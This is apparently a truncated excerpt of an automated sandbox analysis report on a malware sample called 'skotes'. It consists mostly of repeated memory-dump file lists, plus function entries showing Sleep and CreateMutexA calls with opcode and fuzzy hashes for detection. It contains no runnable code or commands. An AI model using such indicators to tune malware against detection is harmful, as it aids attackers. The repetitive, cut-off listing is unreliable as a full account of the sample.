Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7e244d195859d7807808be800c8b44dc5903be904dcec91952fa11710767e026
Instruction ID: eb4f30d7214707586a89ac5eedd1600249f274107aafb9d4d1ab19158bf4d162
Opcode Fuzzy Hash: 7e244d195859d7807808be800c8b44dc5903be904dcec91952fa11710767e026
Instruction Fuzzy Hash: 02315B31B052048BEB189B7CDC88BADBB62EBC5334F244619E454EB3D5D7758980AB52

Function 00F3A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: ba1b58b96e2be886380cf49f0c2f0747bb4aeaf06a35914551c1f98d4044374a
Instruction ID: 2686c535a237c0fc160ca27a85018bbd625970f6327e1b014cf1f2b6935c9e52
Opcode Fuzzy Hash: ba1b58b96e2be886380cf49f0c2f0747bb4aeaf06a35914551c1f98d4044374a
Instruction Fuzzy Hash: 7C316A31B002009BEB18DB79CC88B6DB762EBC5334F244218E494EB3D1C7368980EB52

Function 00F3A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5d68945217df9a29f80ba99a6da567773f75e4a047d9b735cb4f910e2190e343
Instruction ID: b7bdf735cedba83b35325ddf722af7551e954ad3265aec533647f195330ab3dc
Opcode Fuzzy Hash: 5d68945217df9a29f80ba99a6da567773f75e4a047d9b735cb4f910e2190e343
Instruction Fuzzy Hash: 89314A31B052419BEB089B7DDC8DB6DB762EBC6330F244219E454EB3D1D7368980AB52

Function 00F3A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e267a0ea70ec303e5673465c7c0b19d47fc679175eefbf613b9ef19adceea195
Instruction ID: bf8c036585d2f7cce12cd4fb624e4836c7264b8f127c6b1e22f472de01f9bfda
Opcode Fuzzy Hash: e267a0ea70ec303e5673465c7c0b19d47fc679175eefbf613b9ef19adceea195
Instruction Fuzzy Hash: 1C312931B051009BEB08DB79DC8DB6DB761EFC5334F248218E494EB3E5D7798980AB52

Function 00F3A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 4fb399c0b5e1814917c143e17f4ce067f7a242681289b1363b6becee7f981565
Instruction ID: d1e26ec848609b9199c6c75ded499ab8dbab3c665939078900ce34d9e0aff01d
Opcode Fuzzy Hash: 4fb399c0b5e1814917c143e17f4ce067f7a242681289b1363b6becee7f981565
Instruction Fuzzy Hash: 3C312A31B051048BEB08DB79DC89B6DB762EFC5334F288618E494EB3D5C7398981EB12

Function 00F3A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
